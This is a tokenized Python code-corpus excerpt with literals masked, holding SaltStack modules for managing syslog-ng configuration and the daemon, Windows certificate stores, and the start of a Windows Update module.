<NUM_LIT:1> ] <EOL> } <EOL> if verbose : <EOL> return result <EOL> else : <EOL> return list ( result . keys ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import , generators , with_statement <EOL> import time <EOL> import logging <EOL> import salt <EOL> import os <EOL> import os . path <EOL> import salt . utils <EOL> from salt . exceptions import CommandExecutionError <EOL> import salt . ext . six as six <EOL> from salt . ext . six . moves import range <EOL> __SYSLOG_NG_BINARY_PATH = None <EOL> __SYSLOG_NG_CONFIG_FILE = '<STR_LIT>' <EOL> __SALT_GENERATED_CONFIG_HEADER = '''<STR_LIT>''' <EOL> class SyslogNgError ( Exception ) : <EOL> pass <EOL> log = logging . getLogger ( __name__ ) <EOL> log . setLevel ( logging . DEBUG ) <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> _INDENT = '<STR_LIT>' <EOL> _INDENT_STEP = '<STR_LIT:U+0020>' <EOL> _current_statement = None <EOL> _current_option = None <EOL> _current_parameter = None <EOL> _current_parameter_value = None <EOL> def _increase_indent ( ) : <EOL> '''<STR_LIT>''' <EOL> global _INDENT <EOL> _INDENT += _INDENT_STEP <EOL> def _decrease_indent ( ) : <EOL> '''<STR_LIT>''' <EOL> global _INDENT <EOL> _INDENT = _INDENT [ <NUM_LIT:4> : ] <EOL> def _indent ( value ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' . format ( _INDENT , value ) <EOL> def _indentln ( string ) : <EOL> '''<STR_LIT>''' <EOL> return _indent ( string + '<STR_LIT:\n>' ) <EOL> class Buildable ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable , join_body_on = '<STR_LIT>' , append_extra_newline = True ) : <EOL> self . iterable = iterable <EOL> self . join_body_on = join_body_on <EOL> self . append_extra_newline = append_extra_newline <EOL> def build_header ( self ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' <EOL> def build_tail ( self ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' <EOL> def build_body ( self ) : <EOL> '''<STR_LIT>''' <EOL> _increase_indent ( ) <EOL> body_array = [ x . build ( ) for x in self . iterable ] <EOL> nl = '<STR_LIT:\n>' if self . append_extra_newline else '<STR_LIT>' <EOL> if len ( self . iterable ) >= <NUM_LIT:1> : <EOL> body = self . join_body_on . join ( body_array ) + nl <EOL> else : <EOL> body = '<STR_LIT>' <EOL> _decrease_indent ( ) <EOL> return body <EOL> def build ( self ) : <EOL> '''<STR_LIT>''' <EOL> header = self . build_header ( ) <EOL> body = self . build_body ( ) <EOL> tail = self . build_tail ( ) <EOL> return header + body + tail <EOL> class Statement ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type , id = '<STR_LIT>' , options = None , has_name = True ) : <EOL> super ( Statement , self ) . __init__ ( options , <EOL> join_body_on = '<STR_LIT>' , <EOL> append_extra_newline = False ) <EOL> self . type = type <EOL> self . id = id <EOL> self . options = options if options else [ ] <EOL> self . iterable = self . options <EOL> self . has_name = has_name <EOL> def build_header ( self ) : <EOL> if self . has_name : <EOL> return _indentln ( '<STR_LIT>' . format ( self . type , self . id ) ) <EOL> else : <EOL> return _indentln ( '<STR_LIT>' . format ( self . type ) ) <EOL> def build_tail ( self ) : <EOL> return _indentln ( '<STR_LIT>' ) <EOL> def add_child ( self , option ) : <EOL> self . options . append ( option ) <EOL> class NamedStatement ( Statement ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type , id = '<STR_LIT>' , options = None ) : <EOL> super ( NamedStatement , self ) . __init__ ( type , id , options , has_name = True ) <EOL> class UnnamedStatement ( Statement ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type , options = None ) : <EOL> super ( UnnamedStatement , self ) . __init__ ( type , <EOL> id = '<STR_LIT>' , <EOL> options = options , <EOL> has_name = False ) <EOL> class GivenStatement ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , value , add_newline = True ) : <EOL> super ( GivenStatement , self ) . __init__ ( iterable = None ) <EOL> self . value = value <EOL> self . add_newline = add_newline <EOL> def build ( self ) : <EOL> if self . add_newline : <EOL> return self . value + '<STR_LIT:\n>' <EOL> else : <EOL> return self . value <EOL> class Option ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type = '<STR_LIT>' , params = None ) : <EOL> super ( Option , self ) . __init__ ( params , '<STR_LIT>' ) <EOL> self . type = type <EOL> self . params = params if params else [ ] <EOL> self . iterable = self . params <EOL> def build ( self ) : <EOL> header = _indentln ( '<STR_LIT>' . format ( self . type ) ) <EOL> tail = _indentln ( '<STR_LIT>' ) <EOL> body = self . build_body ( ) <EOL> return header + body + tail <EOL> def add_parameter ( self , param ) : <EOL> self . params . append ( param ) <EOL> class Parameter ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable = None , join_body_on = '<STR_LIT>' ) : <EOL> super ( Parameter , self ) . __init__ ( iterable , join_body_on ) <EOL> class SimpleParameter ( Parameter ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , value = '<STR_LIT>' ) : <EOL> super ( SimpleParameter , self ) . __init__ ( ) <EOL> self . value = value <EOL> def build ( self ) : <EOL> return _indent ( self . value ) <EOL> class TypedParameter ( Parameter ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type = '<STR_LIT>' , values = None ) : <EOL> super ( TypedParameter , self ) . __init__ ( values , '<STR_LIT>' ) <EOL> self . type = type <EOL> self . values = values if values else [ ] <EOL> self . iterable = self . values <EOL> def build ( self ) : <EOL> header = _indentln ( '<STR_LIT>' . format ( self . type ) ) <EOL> tail = _indent ( '<STR_LIT:)>' ) <EOL> body = self . build_body ( ) <EOL> return header + body + tail <EOL> def add_value ( self , value ) : <EOL> self . values . append ( value ) <EOL> class ParameterValue ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable = None , join_body_on = '<STR_LIT>' ) : <EOL> super ( ParameterValue , self ) . __init__ ( iterable , join_body_on ) <EOL> class SimpleParameterValue ( ParameterValue ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , value = '<STR_LIT>' ) : <EOL> super ( SimpleParameterValue , self ) . __init__ ( ) <EOL> self . value = value <EOL> def build ( self ) : <EOL> return _indent ( self . value ) <EOL> class TypedParameterValue ( ParameterValue ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type = '<STR_LIT>' , arguments = None ) : <EOL> super ( TypedParameterValue , self ) . __init__ ( arguments , '<STR_LIT:\n>' ) <EOL> self . type = type <EOL> self . arguments = arguments if arguments else [ ] <EOL> self . iterable = self . arguments <EOL> def build ( self ) : <EOL> header = _indentln ( '<STR_LIT>' . format ( self . type ) ) <EOL> tail = _indent ( '<STR_LIT:)>' ) <EOL> body = self . build_body ( ) <EOL> return header + body + tail <EOL> def add_argument ( self , arg ) : <EOL> self . arguments . append ( arg ) <EOL> class Argument ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , value = '<STR_LIT>' ) : <EOL> self . value = value <EOL> def build ( self ) : <EOL> return _indent ( self . value ) <EOL> def _is_statement_unnamed ( statement ) : <EOL> '''<STR_LIT>''' <EOL> return statement in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _is_simple_type ( value ) : <EOL> '''<STR_LIT>''' <EOL> return isinstance ( value , str ) or isinstance ( value , int ) or isinstance ( value , float ) or isinstance ( value , bool ) <EOL> def _get_type_id_options ( name , configuration ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT:.>' in name : <EOL> type_ , sep , id_ = name . partition ( '<STR_LIT:.>' ) <EOL> options = configuration <EOL> else : <EOL> type_ = next ( six . iterkeys ( configuration ) ) <EOL> id_ = name <EOL> options = configuration [ type_ ] <EOL> return type_ , id_ , options <EOL> def _expand_one_key_dictionary ( _dict ) : <EOL> '''<STR_LIT>''' <EOL> key = next ( six . iterkeys ( _dict ) ) <EOL> value = _dict [ key ] <EOL> return key , value <EOL> def _parse_typed_parameter_typed_value ( values ) : <EOL> '''<STR_LIT>''' <EOL> type_ , value = _expand_one_key_dictionary ( values ) <EOL> _current_parameter_value . type = type_ <EOL> if _is_simple_type ( value ) : <EOL> arg = Argument ( value ) <EOL> _current_parameter_value . add_argument ( arg ) <EOL> elif isinstance ( value , list ) : <EOL> for idx in value : <EOL> arg = Argument ( idx ) <EOL> _current_parameter_value . add_argument ( arg ) <EOL> def _parse_typed_parameter ( param ) : <EOL> '''<STR_LIT>''' <EOL> global _current_parameter_value <EOL> type_ , value = _expand_one_key_dictionary ( param ) <EOL> _current_parameter . type = type_ <EOL> if _is_simple_type ( value ) and value != '<STR_LIT>' : <EOL> _current_parameter_value = SimpleParameterValue ( value ) <EOL> _current_parameter . add_value ( _current_parameter_value ) <EOL> elif isinstance ( value , list ) : <EOL> for i in value : <EOL> if _is_simple_type ( i ) : <EOL> _current_parameter_value = SimpleParameterValue ( i ) <EOL> _current_parameter . add_value ( _current_parameter_value ) <EOL> elif isinstance ( i , dict ) : <EOL> _current_parameter_value = TypedParameterValue ( ) <EOL> _parse_typed_parameter_typed_value ( i ) <EOL> _current_parameter . add_value ( _current_parameter_value ) <EOL> def _create_and_add_parameters ( params ) : <EOL> '''<STR_LIT>''' <EOL> global _current_parameter <EOL> if _is_simple_type ( params ) : <EOL> _current_parameter = SimpleParameter ( params ) <EOL> _current_option . add_parameter ( _current_parameter ) <EOL> else : <EOL> for i in params : <EOL> if _is_simple_type ( i ) : <EOL> _current_parameter = SimpleParameter ( i ) <EOL> else : <EOL> _current_parameter = TypedParameter ( ) <EOL> _parse_typed_parameter ( i ) <EOL> _current_option . add_parameter ( _current_parameter ) <EOL> def _create_and_add_option ( option ) : <EOL> '''<STR_LIT>''' <EOL> global _current_option <EOL> _current_option = Option ( ) <EOL> type_ , params = _expand_one_key_dictionary ( option ) <EOL> _current_option . type = type_ <EOL> _create_and_add_parameters ( params ) <EOL> _current_statement . add_child ( _current_option ) <EOL> def _parse_statement ( options ) : <EOL> '''<STR_LIT>''' <EOL> for option in options : <EOL> _create_and_add_option ( option ) <EOL> def _is_reference ( arg ) : <EOL> '''<STR_LIT>''' <EOL> return isinstance ( arg , dict ) and len ( arg ) == <NUM_LIT:1> and isinstance ( next ( six . itervalues ( arg ) ) , six . string_types ) <EOL> def _is_junction ( arg ) : <EOL> '''<STR_LIT>''' <EOL> return isinstance ( arg , dict ) and len ( arg ) == <NUM_LIT:1> and next ( six . iterkeys ( arg ) ) == '<STR_LIT>' <EOL> def _add_reference ( reference , statement ) : <EOL> '''<STR_LIT>''' <EOL> type_ , value = _expand_one_key_dictionary ( reference ) <EOL> opt = Option ( type_ ) <EOL> param = SimpleParameter ( value ) <EOL> opt . add_parameter ( param ) <EOL> statement . add_child ( opt ) <EOL> def _is_inline_definition ( arg ) : <EOL> '''<STR_LIT>''' <EOL> return isinstance ( arg , dict ) and len ( arg ) == <NUM_LIT:1> and isinstance ( next ( six . itervalues ( arg ) ) , list ) <EOL> def _add_inline_definition ( item , statement ) : <EOL> '''<STR_LIT>''' <EOL> global _current_statement <EOL> backup = _current_statement <EOL> type_ , options = _expand_one_key_dictionary ( item ) <EOL> _current_statement = UnnamedStatement ( type = type_ ) <EOL> _parse_statement ( options ) <EOL> statement . add_child ( _current_statement ) <EOL> _current_statement = backup <EOL> def _add_junction ( item ) : <EOL> '''<STR_LIT>''' <EOL> type_ , channels = _expand_one_key_dictionary ( item ) <EOL> junction = UnnamedStatement ( type = '<STR_LIT>' ) <EOL> for item in channels : <EOL> type_ , value = _expand_one_key_dictionary ( item ) <EOL> channel = UnnamedStatement ( type = '<STR_LIT>' ) <EOL> for val in value : <EOL> if _is_reference ( val ) : <EOL> _add_reference ( val , channel ) <EOL> elif _is_inline_definition ( val ) : <EOL> _add_inline_definition ( val , channel ) <EOL> junction . add_child ( channel ) <EOL> _current_statement . add_child ( junction ) <EOL> def _parse_log_statement ( options ) : <EOL> '''<STR_LIT>''' <EOL> for i in options : <EOL> if _is_reference ( i ) : <EOL> _add_reference ( i , _current_statement ) <EOL> elif _is_junction ( i ) : <EOL> _add_junction ( i ) <EOL> elif _is_inline_definition ( i ) : <EOL> _add_inline_definition ( i , _current_statement ) <EOL> def _build_config_tree ( name , configuration ) : <EOL> '''<STR_LIT>''' <EOL> type_ , id_ , options = _get_type_id_options ( name , configuration ) <EOL> global _INDENT , _current_statement <EOL> _INDENT = '<STR_LIT>' <EOL> if type_ == '<STR_LIT>' : <EOL> _current_statement = GivenStatement ( options ) <EOL> elif type_ == '<STR_LIT>' : <EOL> _current_statement = UnnamedStatement ( type = '<STR_LIT>' ) <EOL> _parse_log_statement ( options ) <EOL> else : <EOL> if _is_statement_unnamed ( type_ ) : <EOL> _current_statement = UnnamedStatement ( type = type_ ) <EOL> else : <EOL> _current_statement = NamedStatement ( type = type_ , id = id_ ) <EOL> _parse_statement ( options ) <EOL> def _render_configuration ( ) : <EOL> '''<STR_LIT>''' <EOL> text_repr = _current_statement . build ( ) <EOL> _INDENT = '<STR_LIT>' <EOL> return text_repr <EOL> def config ( name , <EOL> config , <EOL> write = True ) : <EOL> '''<STR_LIT>''' <EOL> _build_config_tree ( name , config ) <EOL> configs = _render_configuration ( ) <EOL> if __opts__ . get ( '<STR_LIT:test>' , False ) : <EOL> comment = '<STR_LIT>' . format ( <EOL> configs , <EOL> __SYSLOG_NG_CONFIG_FILE <EOL> ) <EOL> return _format_state_result ( name , result = None , comment = comment ) <EOL> succ = write <EOL> if write : <EOL> succ = _write_config ( config = configs ) <EOL> return _format_state_result ( name , result = succ , <EOL> changes = { '<STR_LIT>' : configs , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def set_binary_path ( name ) : <EOL> '''<STR_LIT>''' <EOL> global __SYSLOG_NG_BINARY_PATH <EOL> old = __SYSLOG_NG_BINARY_PATH <EOL> __SYSLOG_NG_BINARY_PATH = name <EOL> changes = _format_changes ( old , name ) <EOL> return _format_state_result ( name , result = True , changes = changes ) <EOL> def set_config_file ( name ) : <EOL> '''<STR_LIT>''' <EOL> global __SYSLOG_NG_CONFIG_FILE <EOL> old = __SYSLOG_NG_CONFIG_FILE <EOL> __SYSLOG_NG_CONFIG_FILE = name <EOL> changes = _format_changes ( old , name ) <EOL> return _format_state_result ( name , result = True , changes = changes ) <EOL> def get_config_file ( ) : <EOL> '''<STR_LIT>''' <EOL> return __SYSLOG_NG_CONFIG_FILE <EOL> def _run_command ( cmd , options = ( ) ) : <EOL> '''<STR_LIT>''' <EOL> params = [ cmd ] <EOL> params . extend ( options ) <EOL> return __salt__ [ '<STR_LIT>' ] ( params , python_shell = False ) <EOL> def _determine_config_version ( syslog_ng_sbin_dir ) : <EOL> ret = version ( syslog_ng_sbin_dir ) <EOL> full_version = ret [ '<STR_LIT>' ] <EOL> dot_count = <NUM_LIT:0> <EOL> for idx , part in enumerate ( full_version ) : <EOL> if part == '<STR_LIT:.>' : <EOL> dot_count = dot_count + <NUM_LIT:1> <EOL> if dot_count == <NUM_LIT:2> : <EOL> return full_version [ <NUM_LIT:0> : idx ] <EOL> return full_version [ : <NUM_LIT:3> ] <EOL> def set_parameters ( version = None , <EOL> binary_path = None , <EOL> config_file = None , <EOL> * args , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if binary_path : <EOL> set_binary_path ( binary_path ) <EOL> if config_file : <EOL> set_config_file ( config_file ) <EOL> if version : <EOL> version = _determine_config_version ( __SYSLOG_NG_BINARY_PATH ) <EOL> write_version ( version ) <EOL> return _format_return_data ( <NUM_LIT:0> ) <EOL> def _add_to_path_envvar ( directory ) : <EOL> '''<STR_LIT>''' <EOL> orig_path = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if directory : <EOL> if not os . path . isdir ( directory ) : <EOL> log . error ( '<STR_LIT>' ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' . format ( orig_path , <EOL> os . pathsep , <EOL> directory ) <EOL> return orig_path <EOL> def _restore_path_envvar ( original ) : <EOL> '''<STR_LIT>''' <EOL> if original : <EOL> os . environ [ '<STR_LIT>' ] = original <EOL> def _run_command_in_extended_path ( syslog_ng_sbin_dir , command , params ) : <EOL> '''<STR_LIT>''' <EOL> orig_path = _add_to_path_envvar ( syslog_ng_sbin_dir ) <EOL> if not salt . utils . which ( command ) : <EOL> error_message = ( <EOL> '<STR_LIT>' <EOL> . format ( command ) <EOL> ) <EOL> log . error ( error_message ) <EOL> _restore_path_envvar ( orig_path ) <EOL> raise CommandExecutionError ( error_message ) <EOL> ret = _run_command ( command , options = params ) <EOL> _restore_path_envvar ( orig_path ) <EOL> return ret <EOL> def _format_return_data ( retcode , stdout = None , stderr = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT>' : retcode } <EOL> if stdout is not None : <EOL> ret [ '<STR_LIT>' ] = stdout <EOL> if stderr is not None : <EOL> ret [ '<STR_LIT>' ] = stderr <EOL> return ret <EOL> def config_test ( syslog_ng_sbin_dir = None , cfgfile = None ) : <EOL> '''<STR_LIT>''' <EOL> params = [ '<STR_LIT>' ] <EOL> if cfgfile : <EOL> params . append ( '<STR_LIT>' . format ( cfgfile ) ) <EOL> try : <EOL> ret = _run_command_in_extended_path ( syslog_ng_sbin_dir , <EOL> '<STR_LIT>' , <EOL> params ) <EOL> except CommandExecutionError as err : <EOL> return _format_return_data ( retcode = - <NUM_LIT:1> , stderr = str ( err ) ) <EOL> retcode = ret . get ( '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> stderr = ret . get ( '<STR_LIT>' , None ) <EOL> stdout = ret . get ( '<STR_LIT>' , None ) <EOL> return _format_return_data ( retcode , stdout , stderr ) <EOL> def version ( syslog_ng_sbin_dir = None ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> ret = _run_command_in_extended_path ( syslog_ng_sbin_dir , <EOL> '<STR_LIT>' , <EOL> ( '<STR_LIT>' , ) ) <EOL> except CommandExecutionError as err : <EOL> return _format_return_data ( retcode = - <NUM_LIT:1> , stderr = str ( err ) ) <EOL> if ret [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> return _format_return_data ( ret [ '<STR_LIT>' ] , <EOL> stderr = ret [ '<STR_LIT>' ] , <EOL> stdout = ret [ '<STR_LIT>' ] ) <EOL> lines = ret [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> version_line_index = <NUM_LIT:0> <EOL> version_column_index = <NUM_LIT:1> <EOL> line = lines [ version_line_index ] . split ( ) [ version_column_index ] <EOL> return _format_return_data ( <NUM_LIT:0> , stdout = line ) <EOL> def modules ( syslog_ng_sbin_dir = None ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> ret = _run_command_in_extended_path ( syslog_ng_sbin_dir , <EOL> '<STR_LIT>' , <EOL> ( '<STR_LIT>' , ) ) <EOL> except CommandExecutionError as err : <EOL> return _format_return_data ( retcode = - <NUM_LIT:1> , stderr = str ( err ) ) <EOL> if ret [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> return _format_return_data ( ret [ '<STR_LIT>' ] , <EOL> ret . get ( '<STR_LIT>' ) , <EOL> ret . get ( '<STR_LIT>' ) ) <EOL> lines = ret [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> for line in lines : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> label , installed_modules = line . split ( ) <EOL> return _format_return_data ( ret [ '<STR_LIT>' ] , <EOL> stdout = installed_modules ) <EOL> return _format_return_data ( - <NUM_LIT:1> , stderr = '<STR_LIT>' ) <EOL> def stats ( syslog_ng_sbin_dir = None ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> ret = _run_command_in_extended_path ( syslog_ng_sbin_dir , <EOL> '<STR_LIT>' , <EOL> ( '<STR_LIT>' , ) ) <EOL> except CommandExecutionError as err : <EOL> return _format_return_data ( retcode = - <NUM_LIT:1> , stderr = str ( err ) ) <EOL> return _format_return_data ( ret [ '<STR_LIT>' ] , <EOL> ret . get ( '<STR_LIT>' ) , <EOL> ret . get ( '<STR_LIT>' ) ) <EOL> def _format_changes ( old = '<STR_LIT>' , new = '<STR_LIT>' ) : <EOL> return { '<STR_LIT>' : old , '<STR_LIT>' : new } <EOL> def _format_state_result ( name , result , changes = None , comment = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if changes is None : <EOL> changes = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> return { '<STR_LIT:name>' : name , '<STR_LIT:result>' : result , <EOL> '<STR_LIT>' : changes , '<STR_LIT>' : comment } <EOL> def _add_cli_param ( params , key , value ) : <EOL> '''<STR_LIT>''' <EOL> if value is not None : <EOL> params . append ( '<STR_LIT>' . format ( key , value ) ) <EOL> def _add_boolean_cli_param ( params , key , value ) : <EOL> '''<STR_LIT>''' <EOL> if value is True : <EOL> params . append ( '<STR_LIT>' . format ( key ) ) <EOL> def stop ( name = None ) : <EOL> '''<STR_LIT>''' <EOL> pids = __salt__ [ '<STR_LIT>' ] ( pattern = '<STR_LIT>' ) <EOL> if pids is None or len ( pids ) == <NUM_LIT:0> : <EOL> return _format_state_result ( name , <EOL> result = False , <EOL> comment = '<STR_LIT>' ) <EOL> if __opts__ . get ( '<STR_LIT:test>' , False ) : <EOL> comment = '<STR_LIT>' <EOL> return _format_state_result ( name , result = None , comment = comment ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> killed_pids = res [ '<STR_LIT>' ] <EOL> if killed_pids == pids : <EOL> changes = { '<STR_LIT>' : killed_pids , '<STR_LIT>' : [ ] } <EOL> return _format_state_result ( name , result = True , changes = changes ) <EOL> else : <EOL> return _format_state_result ( name , result = False ) <EOL> def start ( name = None , <EOL> user = None , <EOL> group = None , <EOL> chroot = None , <EOL> caps = None , <EOL> no_caps = False , <EOL> pidfile = None , <EOL> enable_core = False , <EOL> fd_limit = None , <EOL> verbose = False , <EOL> debug = False , <EOL> trace = False , <EOL> yydebug = False , <EOL> persist_file = None , <EOL> control = None , <EOL> worker_threads = None ) : <EOL> '''<STR_LIT>''' <EOL> params = [ ] <EOL> _add_cli_param ( params , '<STR_LIT:user>' , user ) <EOL> _add_cli_param ( params , '<STR_LIT>' , group ) <EOL> _add_cli_param ( params , '<STR_LIT>' , chroot ) <EOL> _add_cli_param ( params , '<STR_LIT>' , caps ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , no_caps ) <EOL> _add_cli_param ( params , '<STR_LIT>' , pidfile ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , enable_core ) <EOL> _add_cli_param ( params , '<STR_LIT>' , fd_limit ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , verbose ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , debug ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , trace ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , yydebug ) <EOL> _add_cli_param ( params , '<STR_LIT>' , __SYSLOG_NG_CONFIG_FILE ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , persist_file ) <EOL> _add_cli_param ( params , '<STR_LIT>' , control ) <EOL> _add_cli_param ( params , '<STR_LIT>' , worker_threads ) <EOL> if __SYSLOG_NG_BINARY_PATH : <EOL> syslog_ng_binary = os . path . join ( __SYSLOG_NG_BINARY_PATH , '<STR_LIT>' ) <EOL> command = [ syslog_ng_binary ] + params <EOL> if __opts__ . get ( '<STR_LIT:test>' , False ) : <EOL> comment = '<STR_LIT>' . format ( command ) <EOL> return _format_state_result ( name , result = None , comment = comment ) <EOL> result = __salt__ [ '<STR_LIT>' ] ( command , python_shell = False ) <EOL> else : <EOL> command = [ '<STR_LIT>' ] + params <EOL> if __opts__ . get ( '<STR_LIT:test>' , False ) : <EOL> comment = '<STR_LIT>' . format ( command ) <EOL> return _format_state_result ( name , result = None , comment = comment ) <EOL> result = __salt__ [ '<STR_LIT>' ] ( command , python_shell = False ) <EOL> if result [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> succ = True <EOL> else : <EOL> succ = False <EOL> return _format_state_result ( <EOL> name , result = succ , changes = { '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( command ) , '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def reload_ ( name ) : <EOL> '''<STR_LIT>''' <EOL> if __SYSLOG_NG_BINARY_PATH : <EOL> syslog_ng_ctl_binary = os . path . join ( __SYSLOG_NG_BINARY_PATH , <EOL> '<STR_LIT>' ) <EOL> command = [ syslog_ng_ctl_binary , '<STR_LIT>' ] <EOL> result = __salt__ [ '<STR_LIT>' ] ( command , python_shell = False ) <EOL> else : <EOL> command = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = __salt__ [ '<STR_LIT>' ] ( command , python_shell = False ) <EOL> succ = True if result [ '<STR_LIT>' ] == <NUM_LIT:0> else False <EOL> return _format_state_result ( name , result = succ , comment = result [ '<STR_LIT>' ] ) <EOL> def _format_generated_config_header ( ) : <EOL> '''<STR_LIT>''' <EOL> now = time . strftime ( '<STR_LIT>' ) <EOL> return __SALT_GENERATED_CONFIG_HEADER . format ( now ) <EOL> def write_config ( config , newlines = <NUM_LIT:2> ) : <EOL> '''<STR_LIT>''' <EOL> succ = _write_config ( config , newlines ) <EOL> changes = _format_changes ( new = config ) <EOL> return _format_state_result ( name = '<STR_LIT>' , result = succ , changes = changes ) <EOL> def _write_config ( config , newlines = <NUM_LIT:2> ) : <EOL> '''<STR_LIT>''' <EOL> text = config <EOL> if isinstance ( config , dict ) and len ( list ( list ( config . keys ( ) ) ) ) == <NUM_LIT:1> : <EOL> key = next ( six . iterkeys ( config ) ) <EOL> text = config [ key ] <EOL> try : <EOL> with salt . utils . fopen ( __SYSLOG_NG_CONFIG_FILE , '<STR_LIT:a>' ) as fha : <EOL> fha . write ( text ) <EOL> for _ in range ( <NUM_LIT:0> , newlines ) : <EOL> fha . write ( os . linesep ) <EOL> return True <EOL> except Exception as err : <EOL> log . error ( str ( err ) ) <EOL> return False <EOL> def write_version ( name ) : <EOL> '''<STR_LIT>''' <EOL> line = '<STR_LIT>' . format ( name ) <EOL> try : <EOL> if os . path . exists ( __SYSLOG_NG_CONFIG_FILE ) : <EOL> log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> __SYSLOG_NG_CONFIG_FILE <EOL> ) <EOL> ) <EOL> os . remove ( __SYSLOG_NG_CONFIG_FILE ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> header = _format_generated_config_header ( ) <EOL> _write_config ( config = header , newlines = <NUM_LIT:1> ) <EOL> _write_config ( config = line , newlines = <NUM_LIT:2> ) <EOL> return _format_state_result ( name , result = True ) <EOL> except OSError as err : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> . format ( __SYSLOG_NG_CONFIG_FILE , str ( err ) ) <EOL> ) <EOL> return _format_state_result ( name , result = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import re <EOL> import logging <EOL> import salt . utils <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtualname__ = "<STR_LIT>" <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . is_windows ( ) : <EOL> return __virtualname__ <EOL> return False <EOL> def get_cert_serial ( cert_file ) : <EOL> '''<STR_LIT>''' <EOL> cmd = "<STR_LIT>" . format ( cert_file ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> matches = re . search ( r"<STR_LIT>" , out ) <EOL> if matches is not None : <EOL> return matches . groups ( ) [ <NUM_LIT:0> ] . strip ( ) <EOL> else : <EOL> return None <EOL> def get_stored_cert_serials ( store ) : <EOL> '''<STR_LIT>''' <EOL> cmd = "<STR_LIT>" . format ( store ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> matches = re . findall ( r"<STR_LIT>" , out ) <EOL> return matches <EOL> def add_store ( source , store , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> cert_file = __salt__ [ '<STR_LIT>' ] ( source , saltenv ) <EOL> cmd = "<STR_LIT>" . format ( store , cert_file ) <EOL> return __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> def del_store ( source , store , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> cert_file = __salt__ [ '<STR_LIT>' ] ( source , saltenv ) <EOL> serial = get_cert_serial ( cert_file ) <EOL> cmd = "<STR_LIT>" . format ( store , serial ) <EOL> return __salt__ [ '<STR_LIT>' ] ( cmd ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> from salt . ext . six . moves import range <EOL> try : <EOL> import win32com . client <EOL> import pythoncom <EOL> HAS_DEPENDENCIES = True <EOL> except ImportError : <EOL> HAS_DEPENDENCIES = False <EOL> import salt . utils <EOL> import salt . utils . locales <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . is_windows ( ) and HAS_DEPENDENCIES : <EOL> return True <EOL> return ( False , "<STR_LIT>" ) <EOL> def _gather_update_categories ( updateCollection ) : <EOL> '''<STR_LIT>''' <EOL> categories = [ ] <EOL> for i in range ( updateCollection . Count ) : <EOL> update = updateCollection . Item ( i ) <EOL> for j in range ( update . Categories . Count ) : <EOL> name = update . Categories . Item ( j ) . Name <EOL> if name not in categories : <EOL> log . debug ( '<STR_LIT>' . format ( name ) ) <EOL> categories . append ( name ) <EOL> return categories <EOL> class 